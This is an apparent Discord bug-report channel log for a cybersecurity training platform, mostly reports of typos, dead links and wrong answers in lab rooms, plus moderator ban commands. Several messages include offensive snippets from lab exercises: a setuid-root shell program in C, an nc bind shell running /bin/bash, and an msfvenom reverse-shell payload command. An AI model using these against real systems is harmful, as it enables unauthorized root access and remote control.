#room-bugs

I can scan it.

when i vim in the machine it hangs up and i cannot do anything

Can you do ip a s

And tell me how many tun* you have?

This also isn't a bug, let's go to #room-hints

i have 1

i am checking writeups and my way is correct

but web server won't answer me on some directorys

tun0

within the brainstorm buffer overflow room, in Task 1 Question 2 "How many ports are open" - The "correct" answer appears to be double the value of the real answer

Windows internal red teaming path doesn’t seem like the answer is working for task 7.

4lL instead of 4IL

It won’t work either

Mate

4lL

Thus work tho

this is what i said. 🤣

might need to steer clear of i's, 1's and l's next to eachother

Thanks mate

@gleaming shadow

thanks

Hi, i don't know if im doing anything wrong but i am unable to start/restart the Apache2 webserver in the embedded Kali OS on the browser neither AttackTheBox

Im kind of stupid heheheh xd

Thanks any way

Hi in the "Walking An Application" room task 3 last question i found the flag "THM{CHANGE_DEFAULT_CREDENTIALS}" by following the previous steps but it doesnt work if someone know if i try the wrong flag or if it's a bug

That isn't the flag for that Q.

O thanks😅

Hi, in this nmap room https://tryhackme.com/room/nmap03 a little more than half way down it says "On scenario where these three scan types can be efficient is when scanning a target behind a stateless.." I believe 'On' should read 'One' as in "One scenario where these three scan types can be efficient is when scanning a target behind a stateless.."

I would like to report a room (not a bug) and I would also like to say that I have very little experience, so I might be wrong... hope I don't tho :)
I was doing the Linux Privilege Escalation room (https://tryhackme.com/room/linprivesc) and I was dealing with Task 11 "Privilege Escalation: NFS".
As the task said, on my machine, as root obv, I compiled the following C code that basically gives you a shell once executed on the target:

int main()
{
  setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}

Once compiled, I set the SUID bit (chmod +s shell) and all that remained to be done was to go
on the remote machine and run the SUID executable (since it was compiled in a network shared folder).
On the remote machine, once executed, a nice surprise awaited me:

   $ ./shell
     ./shell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./shell)

Later, after several searches, I understood the problem:
the remote machine had a different library (GLIBC_2.31) than the one on my machine (GLIBC_2.34).
I wasted something like an hour to figure out how to solve this problem.
The solution was to use static libraries (gcc -static code.c -o shell) so that my executable becomes
a kind of stand-alone and does not have to search for the library it needs in the remote machine.
It would have been nice to have at least a tip from the task (but perhaps the error was not foreseen?).

you could always also copy the bash executable to said folder and mark that as owned by root and suid bit set to get a root shell but yeah this might need some looking into

Cross compilation is always a pain, compile it on the box if you can

I was tagging along with the task :I

If you mean the Attackbox, yes I could've done it with that.
But if instead I had to do it on my virtual machine, to keep everything more inherent in the real world, that was the right way?

I mean the target machine

oh, mh, but then what about SUID

i was a normal user, not root

Add that from your box

You have write access to the share, you can add the bit once it's compiled.

i think the target machine didn't have "gcc"

I think I tried

Possible, I'm just giving more solutions

gotcha, thanks anyway. I wanted to report it so that maybe some clue about it is added :)

at webosint you are saying that the correct answer is 4 but i can see more than 50 IP addresses for RepublicOfKoffee.com.

Room: Autopsy. Link: https://tryhackme.com/room/btautopsye0. Bug: Found in task 3, the explanation says the name of the case is Tryhackme, but the image says Sample Case. Nothing major, looks like a typo

thought it was worth pointing out, seems like smt easily overlooked

also can i sent a picture for question(maybe is a bug) but if is not i don't want to show the answer. How can i do it?

Room: https://tryhackme.com/room/microsoftwindowshardening
VM split screen not functioning

You can still rdp/remmina in to it

right. the box claims to have split functionality and doesn't tho so figured i'd mention so it's brought to attention

In room Splunk 101 (https://tryhackme.com/room/splunk101) Task9, the two links for BOTSv1 and BOTSv2 are broken. I guess they should point to the room Splunk 2 and Splunk 3? But the current links point to private/locked rooms.

Hi, it's not really a "bug", but certainly the room 'overpass' got a bit easier to root since it's vulnerable to CVE-2021-4034. This made it a bit easier to root compared to intended manipulation of scheduled jobs.

That's normal for old rooms.
Do it the proper way so that you learn, rather than making it easy for yourself.

here it's missing a ")"

room: abusing windows internals

oh wait it's only the color that is wrong

if it wasn't for a walkthrough I didn't know what 'the proper way' was :'), but i'll ignore this cve in the future

It's something you need to.remember for older content

@eternal summit ⬆️

@hollow star Hey, got a couple typos in task 5 of https://tryhackme.com/room/redteamrecon VidewDNS.info. to ViewDNS.info multiple times 🙂

And in task 6 load google_site_web should be modules load google_site_web

https://tryhackme.com/room/splunk3zs has a link to https://tryhackme.com/room/bpsplunk in Task 1, which has been made private.

I'm getting the same, how did you resolve this?

They were using the IP of the attackbox, and hadn't deployed the actual target machine

Or were using the IP of their own machine instead of the target

Some wording in the new https://tryhackme.com/room/credharvesting room is a bit confusing. Specifically in the Local Windows Credentials section.
It doesn't specify how MSF uses in memory code injection.
Some simple fixes would be:

• against the LSASS.exe process
• to inject raw shellcode into the LSASS.exe process
• to inject the LSASS.exe process

But it does... I think you needed to press "Show split view" at the top by the launch attackbox view.
I'll ping @quaint sparrow as I saw they replied too 😉

Under "Learn Cyber Security" Room, Task 2 site, "All on the same network" there is a grammatical error "to monitor stores' temperates "

OPSEC Room #Task 7 seems not working. I can't submit the sequence even in the right order (tried every combinations)

Takedown should be provisioning with subscriber tier resources, is currently unfinishable for free tier users due to how long it takes the services to spin up. Bumping to subscriber tier resources fixes this issue

https://tryhackme.com/room/windowslocalpersistence - "Task 5 Abusing Scheduled Tasks" -> Comand Prompt C:\> schtasks /query /tn thm-taskbackdoor and Command Prompt say C:\> schtasks /query /tn thm-taskbackdoors <- secound Comand Prompt s one too many

Not sure if room bug, but. Splunk 101 Task 7, "What is the highest EventID?" The answer isnt what the highest ID is but what ID has the most amount of events.

That probably needs to go via @glad badger for a resource bump for free users

@misty cave yep already heard from tim, a request has been put in for more resources 👍

Good to hear ☺️

@dusky junco

-ban 630416104556068910 -ddays 1 nsfw discord invites

🔨 Banned SWAMPY#2255 indefinitely

ty(: gone

-ban 885158530619945071 -ddays 1 nsfw server

🔨 Banned priyank#3344 indefinitely

https://tryhackme.com/room/careersincyber Task 8 needs a link to the red team learning path now that it has been made

Bro why is the agent sudo room refusing an ssh connection

have you asked in #site-support ?

I thought it's a bug

Cuz I have completed the room before

Hello, I would just like to report a bug for 'Task 5' of the Metasploit: Exploitation module.
The eternalblue exploit only works through the AttackBox and not with OpenVPN and your own VM.
https://tryhackme.com/room/metasploitexploitation

It works over openvpn.
Make sure your options are correct and that the VPN is running directly in your VM.

The majority of people who fail on this, often don't set their LHOST to their tun0.

Or that's my opinion, rather

@dusky junco

Is this a typo in the snort room? Should the sid description at the bottom say greater than 1,000,000? Got a picture but can't seem to upload one. 😅

You need to verify.

!docs verify

In the Shodan.io section of the Passive Recon room (Jr. Pentester path), the answer to the first question (country with 2nd highest public Apache servers) is currently Japan. Germany, the answer according to the room is now 5th highest.

Which task?

Task 6, 1st question

What did you search for?

Because when I search, Germany is second.

?

I searched Apache and clicked on the thing that said apache servers. It autocompleted to this search result, which is probably why the results were different. My bad

Not a real bug, only a very small mistake in a picture. But could maybe irritate some people, me included 😄
In the room https://tryhackme.com/room/dataxexfilt, in Task6 / Section: HTTP Tunnel. The first figure shows that app.thm.com is accessable from the internet and uploader.thm.com not, that should be the other way around as mentioned in the text above. I guess the labels for app.thm.com and upload.thm.com should be changed 🙂

Just type "Apache"

Yup i did, got the same results as you mentioned earlier. Apologies for the confusion

Is this a typo in the snort room? Should the sid description at the bottom say greater than 1,000,000?

https://tryhackme.com/room/snort
TL:DR;
task 3, this question "According to the official description of the snort, what kind of NIPS is it?"
Please delete this.

longer;
task 3, this question "According to the official description of the snort, what kind of NIPS is it?"

So got a little bit of an issue with this question. The room does a great job of describing IPS/IDS stuff in task 3, but there is no mention of the types of NIPS.

Yeah, I get it, go read the "official description" of snort and you find the answer.

THing that bugs me is that the answer is just a description of NIPS. If it were truly a "type" of NIPS, what are the other types then?

Can you all straight up delete this question? Read the THM website forums and other people get stumped on this.

https://tryhackme.com/room/wireshark
Task 11 Questions 4: Looking at the data stream what is the full request URI from packet 18?

The data out of WireShark starts off with: http://pagead2.g... but the correct answer to the question is: https://pagead2.g

The answer seems to be wrong because https isn't covered until a later task.

why haven't Vietnamese ?

I'm assuming you got the answer to this but if you didn't and if it helps, it's more of a descriptive hyphenated word. Had me stumped for ages too tbh. 😅

I would suggest revising the question to, How does snort describe their Network Intrusion Prevention System in the official description. Or for comedy value you could just ask how they describe their NIPS. 🤣

Hi!

Hi! https://tryhackme.com/room/networkservices2 I think task 9 is dead, the credentials in the scenario are not relevant

Can you supply some more details? The room hasn't changed

I've been maybe dumb to assume that the creds were given: "root:username". For ssh and mysql. But I didn't find any obvious one that works.
So now I start enumerate subdomains. But I don't feel like it s the goal of the exercise.

What?
I think you've deployed the wrong machine. Is this the mysql task?

yes mysql task 9 ; but I already restart the box, as I thought the same

The credentials provided are for mysql. What is the issue that you're having?

$ mysql -u root -p password -h 10.10.43.111
Enter password: 
ERROR 1049 (42000): Unknown database 'password'

This points at your syntax being incorrect

It's trying to use password as the name of the database

-p doesn't take an argument

ok thx gonna dig the doc

Cool, job almost done ! thx @eternal summit I was getting f***ng upset

Gave +1 Rep to @eternal summit

oh that explains why fonk got a problem.... was unsure what might have been the problem and did not feel like asking for details

'mysql -h 10.10.X.X -u root -p' runs pretty well as suggested by Ninja ; "didn't feel like asking" is a rude habbit for me , maybe why I didn't go straight enough !

was leaving for a long walk just at that moment and knew it would take a long while for shadow to come back home.... so felt like it would be more rude to ask for the command you used and then leave for 4+ hours

@eternal summit ⬆️

@hazy tiger ⬆️

Question 2 & 3 in the LAPS section of the https://tryhackme.com/room/credharvesting room need to be switched. Currently you are asked to provide the LAPS password then the user that can read LAPS passwords but, in reality, you need to find the user first.
Please see the hints below as further evidence.

Room: https://tryhackme.com/room/sqlmap
Task: 2
missing be in sentence "which could a vulnerable parameter."

-ban 602961821284040723 -ddays 1 Nitro Scam, if your account got compromised, secure it and appeal at bans@tryhackme.com

🔨 Banned Angeless#8474 indefinitely

Hi! In the redteam path im doing the Windows Persistence Room and I can't retrieve the flag9 form the 5th task of the room, i have repeat the whole process twice and i still don't get it
i was likely to think that it could be my fault but, the process seems prety simple to be my mistake two times so i think that something is wrong

Some one can help me to retrieve the flag?

#room-help please

@glad badger May I dm regarding content qa?

-ban 563684204295225355 -ddays 1 nsfw discord invite

🔨 Banned LordOpal#4091 indefinitely

Good day,

I am working on "Red Team - Firewall Evasion v0.5" room, specifically "Task 8" which should be easy, but I am not successful.

So through the "Task 6" web browser I enter nc -nlvp 8081 -e /bin/bash
In the attack box terminal I enter nc -v [IP of task 6 machine] 8081 and I receive "Connection Refused".

Is this a bug or do I need to reboot my brainbox?

Hello guys i have a probleme in the majority of the rooms , the images included in the room doesn't appear to me why i encounter this issue ?

Hi guys, I finished a room yesterday (Introductory Networking) and I didn't receive any point, is it normal ? Ty

It is for rooms that are set not to give points

That's usually just tutorial rooms, especially if they have a tonne of questions.

Oh possible, sorry! Where can I see if the room give me points 🙂 ? Ty for your answers

Gave +1 Rep to @obsidian kiln

Last I checked, you can't from the "front-end" -- only in the management options for the room 😦

Just a case of answering a question and seeing if you get points

yeah ok

I did that yesterday but i thought there was a little delay. Ty for answering !

Np 🙂

Hello I just reached 7 streaks I can now start wreath but I encounter a problem : I can't answer questions on all tasks :

note that it is not the first time that this happen to me.

I really want to do this module

Head to options in the upper right corner -> leave room, then rejoin it

It worked thank you 🙂

Gave +1 Rep to @hazy tiger

Til: You can see the scoreType through the room code details request

2 gives no points

0 gives less points than 1

That'll do it

Yes, you can pull a lot of info out of the API

Hi guys, I'm have problem with room Gallery666, the privilege escaltion /opt/rootkit.sh not function, it's so, open nano /root/report.txt, press ^R ^X cannot open commando execution. More someone be the problem?

a little too much

Red Team Learning Path (coming soon)
Careers in Cyber, Task 8 ~ I think this needs to be updated.

-ban @toxic solar -ddays 1 Nitro Phishing. Secure your account and then email bans@tryhackme.com to appeal this ban.

🔨 Banned heinhtet#1180 indefinitely

Room:Windcorp Ra 1.1
and when i download spark_2_8_3.deb file using smbclient and tried installed using dpkg -i <installation file>
I get error as follows:

dpkg: regarding spark_2_8_3.deb containing spark-messenger, pre-dependency problem:
 spark-messenger pre-depends on openjdk-8-jre | oracle-java8-jre
  openjdk-8-jre is not installed.
  oracle-java8-jre is not installed.

dpkg: error processing archive spark_2_8_3.deb (--install):
 pre-dependency problem - not installing spark-messenger
Errors were encountered while processing:
 spark_2_8_3.deb

and when i try to debug it by installing it's pre-dependency openjdk-8-jre, oracle-java8-jre
I get errors as follows:

                                                                           ```

kali@kali:~/Downloads$ sudo apt install openjdk-8-jre
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package openjdk-8-jre is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
nvidia-openjdk-8-jre

E: Package 'openjdk-8-jre' has no installation candidate

kali@kali:~/Downloads$ sudo apt install oracle-java8-jre
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package oracle-java8-jre
```

i think the information provided is outdated

according to me above error makes the room unsolveable

This is not a bug with the room, and therefore doesn't belong here

please guide me how to install old java as it has no installation candidate

i tried installing from https://packages.debian.org/sid/amd64/openjdk-8-jre/download but i get error

sry i messaged you because we were common in three servers

could you tell me how would i install open jdk 8 jre

@runic crown This is not a room bug.
As Lassi said, if you're not familiar with installing software then this room is likely beyond you.
Please stop attempting to report this as a bug, it is categorically user error.

Room: Diamond model
Bug type: Typo
Location: Task 9 - Practice Analysis
Description: Please, deploy the static site attached to this tas should be task

Room: Diamond model
Bug type: Formatting
Location: Task 9 - Practice Analysis - View Site
Description: Bottom right selection in the diamond model, third option Microsoft's Adversary Recreation Model is not completely contained in the option box.

Fixed typo. Thank you for reporting. 🙂

Gave +1 Rep to @blazing stump

i solved that room ; so not beyooondd me; everyone just wants me to get depressed

😢

so i completed the room but didnt " complete " the room according to the site and didnt earn the reward

any idea what i should do

this been for a while i just noticed it XD

I'm not sure whether this is a bug or intended behavior:
I'm currently in Wreath Task 14, in the question How would you forward 172.16.0.100:3306 to your own port 33060 using a chisel remote port forward, assuming your own IP is 172.16.0.200 and the listening port is 1337? Background this process. I made a typo in the answer, which just happened to be a . and the answer was still accepted. To test this I replaced the last two characters of my answer to the last question of Task 14 with .. and that answer got accepted too. Is this intended or some regex magic that is misbehaving?

ah the dots have been replaced with the correct characters now 🙂, TIL

Wrote a wrong answer and it got accepted as correct. (should have been 172.16.0.0/16 instead of 172.16.0.0/1)

see lassis message 2 messages above your own

I refreshed the page and it indeed showed the right answer but it shouldn't have accepted mine in the first place.

it accepted it because of answer tolerances

i.e you can typo an answer slightly and it will get accepted to not punish you with having to retype the whole thingy

Oh alright thank you

Gave +1 Rep to @rugged canyon

no problem

room: pyramidofpainax
poorly worded?? "A hash is not considered to be cryptographically secure if two files have the same hash value or digest."

roo: powershell
Task is What is the location of the file "interesting-file.txt" but ||the file is actually named interesting-file.txt.txt|| in the vm

Room: Sakura Room
Bug type: The answer is not updated.
Description:

The cherry room answers have not been updated. The following question in Task 5 should have changed the onion domain that is the answer.
  Q2:What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?
[Details]
 The domain presented in the hint, depasteon6cqgrykzrgya52xglohg5ovyuyhte3117hzix7h5ldfqsyd.onion, does not exist. Instead, the site has been updated and the domain is http://deepv2w7p33xa4pwxzwi2ps4j62gfxpyp44ezjbmpttxz3owlsp4ljid.onion.

Also, the following problematic file from Task5 does not exist.
  Q3:What is the BSSID for the attacker's Home WiFi?
[Details]
  Please search and check the following The file that should be there does not exist.
http://deepv2w7p33xa4pwxzwi2ps4j62gfxpyp44ezjbmpttxz3owlsp4ljid.onion/show.php?md5=0a5c6e136a98a60b8a21643ce8c15a74 

room: Windows x64 Assembly
bug type: typo
desc: in task 6 the text says "DIV (unsigned) and IDIV (unsigned)", while IDIV is a signed opcode (text should be "IDIV (signed)")

https://tryhackme.com/room/btsysinternalssg task 9 has you run strings on zoomit.exe to get the path of the .pdb file the correct answer is to get the path for the 32 bit version but despite running the strings command on the 32 bit app it gives out the path to the 64 bit varitety thus you have to guess the right path or cheat with a writeup. Given the prevailance of 64 bit and that the vm were doing this on should have went ahead and used the 64 bit version as the correct answer

.

Hi guys! I have a problem with the Mustacchio machine. I tryed to connect hith ssh but i didn't have a correct passoword. Now I have a password and i geet a error code if i try to connect on: barry@10.10.92.187: Permission denied (publickey). How can I fix this problem? 😄

That ain't a bug. Research the error and find out what it means -- it's a really common configuration that you should be aware of.

Hey folks, I am having a hell of a time with OSF Lab02-Task 09. I am not able to find a file called "unknown1" anywhere on the VM. Any tips?

Hey guys, so I'm doing the intro to networking and in the whois section, the registered Tech Email for microsoft.com shows up as info@verisign-grs.com in the cmd but the answer is not accepted, maybe it's not been updated yet?
https://www.iana.org/domains/root/db/microsoft.html

You, uh, are looking at registration details for the .microsoft TLD, not the domain registration details for microsoft.com...

I have noticed sometimes the rooms are letting incorrect answers pass as correct. For example, the the question below in the Linux Fundamentals Part 1 room

This is answer tolerance

Are you saying it's a feature? I would have thought Answer Tolerance has its place, but in this instance I would call it a bug. Because it is teaching me via feedback something that is just incorrect.

Yes it's a feature.

It's not a great feature, it has flaws, but it's intentional

fair enough!

reloading the page will correct the answer in the box to the correct one

so the wrong answer being there is not permanent

oh yeh! interesting!

In linux fundamentals part 2: permissions 101, the task refers to a "cmnatic.pem" file, but the screenshot only shows "file1" and "file2".
(This is the right place to report this kind of thing right?)

this has happened a few times to me and i have no idea why. So when im doing a room and it has a machine start button i press it and launch it to work on the problems. however when going to the next room or even leaving the page entirely and coming back later it will not let me create or launch a new machine since it says that there are already the max running. Even though there is nothing running on my end. Any help with this?

Have you forgotten to close some past machines?

Made it a habit to just close machines once I'm ready to deploy the next one

Rly easy to do as well

no, i normally close them once ive finished with them. but even if i did forget to close them, how would i even go about it? since its been a whole night of not doing the task and it still says that there are max machines

since i cant even progress until i can fix it, kinda bummed out aha

https://tryhackme.com/api/vm/running

Use that link.

It will give you a list of running machines.

And as this isn't a room bug, if you need more help, please use #site-support

Does maybe the NetworkServices Room a problem with the ssh connection?(the SMB machine)

It does not. Please go to #site-support and explain more about your problem

How much do you know about the history of this one? Nessus doesn't keep the answer stable

I think that'd be the best solution, and add a warning in the question

Will THM change it, or can Dark/Cake?

@eternal summit ⬆️

-ban @surreal cedar -ddays 1 Nitro phishing. Secure your account and then email bans@tryhackme.com to appeal this ban

🔨 Banned Pasindu99#6834 indefinitely

looks like the browser history is gone from the machine in the room blaster

Known issue

okay

Good Day All,
In room Splunk 2 (splunk2gcd5) Task 5, question 2, regarding the season and episode. The file found shows S#E# in the filename but the answer is formatted as S##E## with no indication you need to add additional numbers to your answer.
I was only able to figure out adding the additional numbers from a question/answer here on discord.
Let me know if you need additional information and anything else from me.

In room AttacktiveDirectory, Task 5, question 2, regarding the Hashcat Examples Wiki, the wiki has the Hash-Name as "Kerberos 5, etype 23, AS-REP" vice what the answer will except "Kerberos 5 AS-REP etype 23"
I was only able to get this due to the Answer format pattern.

hi you have 2 rooms both have same name
active directory basics

One is old, I think it's getting removed.

I keep getting 500 Internal Server Error when I should just get a successful upload message in uploadvulns room is this normal?

Hello on Advent of Cyber 2 [2020] Day 1 -- After reloading the page while connected, the website is forwarding me back to the login screen once cookie changed instead of just reloading panel page

Hello, in the principle of security room - task 4 - question 1 and 3 is the preview(astersik) of the answer false

The asterisks are generated from the correct answer, they can't be wrong.
Please provide more information because it's unclear what you mean

how should i provide more information without showing the answer of the question or is it okay to write it here?

Mark it as a spoiler if you want, but make sure you refresh the page first so it replaces the answer with the correct one as stored on the server

good tip with refreshing the page, after refreshing there was deleted a space between 2 words..

You've bumped into answer tolerance

Answer tolerance is not a bug

Answer tolerance is a feature to make your life easier

ah okay cool, I thought it is a bug, because in the text it was written with a space..

because in the text was ||The Bell-La Padula Modell|| but the answer was || The Bell-LaPadula Modell|| that was why I was so curious about it

Good day again All,
In room Disk Analysis & Autopsy (autopsy2ze0), Task 1, question 2, would it be better to say "computer name" vice "computer account name"?

Hi guys, I'm having a problem with https://tryhackme.com/room/chillhack room. Basically, there is a script inside the target that we need to run with sudo as user "apaar". The problem is that the script doesn't work for me.

Script output:

Looks like it works. Please ask in #room-help

Ok and thanks for testing

sometimes machines in room become unresponsive after u complete them atleast one time
it happens to me in Mr.robot room and Game zone

Which machine?

Target machine or attackbox?

Hello!
I was doing the Linux Fundamentals #1 room and I stumble upon this - I believe, error. When I run whoami on the machine it gives me root, but the expected answer is tryhackme. Is this an error? https://tryhackme.com/room/linuxfundamentalspart1#

Ohhhh okay, that makes sense. I was fumbling a bit with the machine button on the top menu, yes.

Thanks!

-ban @dull ibex -ddays 1 Nitro phishing. Secure your account and then email bans@tryhackme.com to appeal this ban

🔨 Banned Prabesh#6852 indefinitely

http://10.10.87.140/customers/reset will not load. This is on Authentication Bypass - Logic Flaw. Is anyone else having this issue? I can't complete the room without accessing this page. Tried loading on Chrome and Firefox.

The Writeup for https://tryhackme.com/room/sqlilab is no longer valid.

The recommended Docker image in the OpenVAS room needs at least two fixes inside the container to deal with issues in 2022. It may work for the purposes of the room, scanning with the included 2015ish era NVTs, but did lead me astray as being a viable option to deploy elsewhere (to be fair 97% of the internet agrees with THM on this being an easy recommendation)

This person apparently documented the two issues I had in one place (but both are issues on the mikesplain/openvas Docker github as well):

https://systemweakness.com/openvas-docker-container-setup-working-2022-all-nvts-200fbcb8bd9f?gi=1ef66c55a9d6

While this is not an option for the THM room since the NVTs need an hour or so to load on first boot, there's actually new official Docker Compose containers from Greenbone which are up to date, and worked fine for me deploying a bit wider than an example for a room.

https://greenbone.github.io/docs/latest/22.4/container/index.html

This is more of a heads up, rather than "please fix this", in case anyone else stumbles across this or searches. But may be good to update this room eventually

While I'm on this, some notes on Greenbone's guide if anyone actually reads the above lol:

• Adding your user to docker group can be insecure as you basically get root equivalency from what I understand, just keep using sudo.
• Echoing your password change in a command is not great, as many will forget and leave it in history, you can change the admin password inside of OpenVAS/GSA

In the Passive Reconnaissance room (passiverecon), Task5 question could have two answers. I image this due to a additional 5 letter sub-domain since this room was created/last updated.

You can avoid logging a particular command by prefacing it with a space

Interesting, never heard of that before. Thanks!

Target

On the last section before the conclusion of Further Nmap room, I am unable to access the machine. Have been waiting for more than 10 minutes as per the given note.

Didn't even got any response from the ping command I ran to the IP address.
I'm using AU-Regular-1 VPN config.

Are you on the VPN?

yes I do

Can you check your VPN output?

yes, it says... Initialization Sequence Completed

should I send you a screenshot?

Nah, It's ok.

Have you tried to do an Nmap scan?

yes, it fails

sudo nmap -sX 10.10.176.239 -vv

Try adding -Pn

okayy, lemme try

The room is definitely up and scannable. If you need more help, use room help/hints, as it's not a bug.

ah okay i'm sorry. it worked with -Pn, i feel dumb

thanks anyway!

No worries 😄

heey guys

anyone here for room NAX ?

Hi everyone!
Could someone please check if it is still possible to get an reverse shell on the "BRAINSTORM" box ?
The connection from the box is always dying on me even though the BOF exploit works fine on my Windows-VM.
[See screenshot for countless attempts]

I have not done that room, but what's the payload you generated ?

So what's the command you used ?

this one:
msfvenom -p windows/shell_reverse_tcp LHOST=10.14.4.205 LPORT=8444 EXITFUNC=thread -a x86 --platform windows -b "\x00" -f c

I also tried that in python but it did the same thing for me

Didn do nuffin

I tried to change the vpn and tried the exploit again before that. Thats why the IP differs. But ye... no luck

Alright, I will try that. Ty 🙂

Gave +1 Rep to @vital vine

Caught the shell finally

I don't quite understand.
In order for me to reach thm - websites from boxes, I need to change the MTU to 1200 then it is working fine.
Now I can't catch a shell for the first time and the reason was that the MTU was too low apparently.
What should I do about this?

apparently 1400 aswell, that was the sweet spot for me

I did that but vpnscript didn't calculate that for me. It just told me 1500 is ok and 1200 is ok.

The website comes up and down. We had recent completions of the room using the depasteon6cqgrykzrgya52xglohg5ovyuyhte3117hzix7h5ldfqsyd[.]onion url.

EDIT: Looks like they indeed deprecated the other V3 URL. Will update.
EDIT 2: Updated the hint image and answer. In previous domain changes they kept the same hash, looks like when they switched to this new V3 domain they removed some old ones included ours. Please try now and reach out if it still doesn't work.

Thanks Sinwindie, the onion site is not stable, so it is hard to create a challenge. I'm rooting for you.

Gave +1 Rep to @opal viper

https://tryhackme.com/room/introductoryroomdfirmodule

Typo in "behaviour"

Enjoying the look of the new UI, some typos.

its should be it's

it's should be its

The question in Task 9 of the room https://tryhackme.com/room/btsysinternalssg is incorrect. The accepted answer is "C:\agent_work\112\s\Win32\Release\ZoomIt.pdb" but what the command actually gets you is nowadays the following:

Room https://tryhackme.com/room/wiresharktrafficanalysis is linking to two private rooms warzone 1 and warzone 2

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @modern raven

Musical Stego room (https://tryhackme.com/room/musicalstego) has a problem with the second to last question I think. It says to use a github link instead of a pastebin link because it is down but i think the github link is down aswell.

The holo network is not working properly it drops connection. And for some reason I can't bypass the anti virus I have tried the method mentioned in room and read some walkthrough and no method is working.

Hello, in Network Services Room, Task 6: when nmap scanning target machine, result is all ports are closed. When entering 0 into the answer of "how many ports are open" (and by the nature of subsequent questions) receive notice that this is incorrect. Have attempted reloading the page and starting both a new target machine from the specified task and a new attackbox - same result. Am I missing something, or is this a bug? https://tryhackme.com/room/networkservices#

Are you scanning all ports?

Not yet, giving that a go now

Good idea, it's best to only report things in here, when you're sure it's a bug

You know what, I see my problem. Thanks for your help, and I'll make sure that the error is a bug next time I report. Sorry!

no worries 😄

You got there in the end.

https://tryhackme.com/room/kenobi room, Task 3 Q4: Answer must be 3 not 4.

Network Services skidy's Backdoor doesnt show up in nmap scan anymore : fingerprint matches too many ...error on both kali box and kali vpn

telnet isnt working properly either

In room: Nmap Basic Port Scans in task: Fine-Tuning Scope and Performance i find: "For example, --max-rate 10 or --max-rate=10 ensures...." i think it should be min and max.

-ban 499520043294654464 -ddays 1 scam

🔨 Banned MeiTrix#0182 indefinitely

https://tryhackme.com/room/linuxfundamentalspart2

Task 3:

Should be a space between a and --help

-ban @analog glacier -ddays 1 Nitro phishing. Secure your account and then email bans@tryhackme.com to appeal this ban

🔨 Banned th#8522 indefinitely

Not sure if I've overlooked something here, but in https://tryhackme.com/room/linuxfundamentalspart3 task 8 it wants you to read the apache2 logs, (/var/log/apache2/access.log) however the current user doesn't have permission to read the file so I'm not sure how we can actually answer the question

It's in one of the archived files there

Look for one you can read

Ah Im an idiot thanks, I assumed it would be the default access.log file

Gave +1 Rep to @eternal summit

The MITRE room, in section 3, says to use v8 of the TTP to answer the questions. The question, "What groups have used spear-phishing in their campaigns?" seems to have had its answer partially updated to reflect a more recent version.

I need to fix this actually. Basically, the àccess.log`gets created because the apache2 service starts up on boot, which means the original access.log gets rotated to access.log.1

Problem is my VM for that room is on the THM account and not mine. Let me add a ticket to our triage board and get this looked into(((:

your thinking in it being access.log is right - that is what it is intended to be, but the logs get rotated when you deploy the vm atm

ty a lot, i was stuck in there, got the same answers

Gave +1 Rep to @hot barn

The Python Basics room doesn't appear to add any values to the daily questions/ Streak count for the day or any additional points it seems. https://tryhackme.com/room/pythonbasics

On section 5 now and having to rely on the wayback machine to access any of the information needed to answer the questions. I found a blog that links to some of the relevant info but it's all 404s on the live site. This section needs a complete overhaul.

I think I am running into a bug on the OWASP juicebox. I am completing things correctly, but I am not getting the flags back. Do I put that in here or elsewhere? In the meantime I can use a writeup, as I am happy that I am completing the tasks correctly, but wanted to run it by someone.

turns out all the flags came through in a rush all at once like 20min later

this is fixed now @placid abyss 🙂

The conclusion of the Splunk room mentions two more rooms, one which is private and the other one just returns an error page.

Great! Thank you!

Gave +1 Rep to @dusky junco

In the cyber defense pathway, Active Directory Basics is showing up as 'undefined' for me.

oh... guess they forgot to make it link to the new active directory basics instead of the old one or something like that

It was showing as undefined for me as well but worked fine when I clicked on it

Is there supposed to be an image here?

Funny, the image can be loaded (going directly to https://assets.tryhackme.com/additional/win-fun2/netstat.png)

Just not in the actual room

what room is it?

https://tryhackme.com/room/windowsfundamentals2x0x

Task 7

looks like a local bug maybe?

Interesting, must be ublock

Didn't think that would affect it, huh

We're looking into this. Thank you for reporting. 🙂

Gave +1 Rep to @exotic marlin

This has now been resolved. 😎

I'm in the Musical Steganography challenge room and noticed first that there is a suggestion to complete the CCStego room first, but this room is private. Also the Github link in the hint does not exist anymore so there is no link at all to progress from task 4

EDIT: Pressed enter by accident 😅

Good Day All, In Python Basics, Task8, the provided 'bitcoin.py' script has a typo. It's currently numbered 1, 2, 2 instead of 1, 2, 3.

Also, is there a public facing page/repository that shows what bugs that have been reported on already and their status? Just curious as I like to help report things but don't want to duplicate reports that have already been reported and trying to search in all the rooms chat can get chaotic since there doesn't seem to been a standard format for reporting. If you need/want more information of my thoughts please let me know.

Just this channel only.

Would there be any interest of hearing a alternative solution to help better track and log them?

possibly some automation also

Possibly speak to a senior mod/Hydra/staff..

Should I pick anyone of them at random or a specific person/group here on discord? I don't want to bother/disturb anyone, or just bust in someone's DM's randomly.

In the room "OSCP BOF Prep" from path "Offensive Pentesting" under the exploit python script it says "Run the following command to generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server" There is a grammar mistake which should be corrected to than not that

heyyyy ! i m doing the tor for beginners room : https://tryhackme.com/room/torforbeginners
but the last answer is not good even if i copy/paste the btc address.
Maybe the adress changed.
The given website to visit is : http://danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion/

Task 1 for How Websites work seems to have the incorrect answer

What's your answer?

front end?

Your answer is wrong.

The number of * is a clue to how long the answer is, and the format.

thanks, thought i tried client-side... maybe fat fingered it

More than likely the hyphen.

can someone let me know how to get the scan to work correctly ?

Roomname: Sysinternals
Issue: I am unable to mount the sysinternals drive due to lack of internet access. it is unable to connect even after running the commands to enable webclient and webdiscovery

Correct. Not a bug, that method was an example provided in the room

ah, cause all the images and instructions are telling you to launch the tool from the mounted drive.

Thanks for clarifying

@gleaming shadow

?

Oh already handled, there was a scam

You can check #voice-chat

🔁

-ban 432488466853527552 -ddays 1 posting shady links with shady scams for phishing

ree

